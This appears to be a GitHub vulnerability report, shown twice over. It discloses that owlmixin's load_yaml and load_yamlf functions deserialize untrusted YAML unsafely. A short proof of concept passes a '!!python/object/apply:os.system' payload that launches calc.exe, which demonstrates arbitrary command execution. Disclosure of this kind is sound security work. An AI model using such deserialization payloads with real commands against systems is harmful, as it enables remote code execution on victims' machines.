from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]
Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered:
from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]
Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered: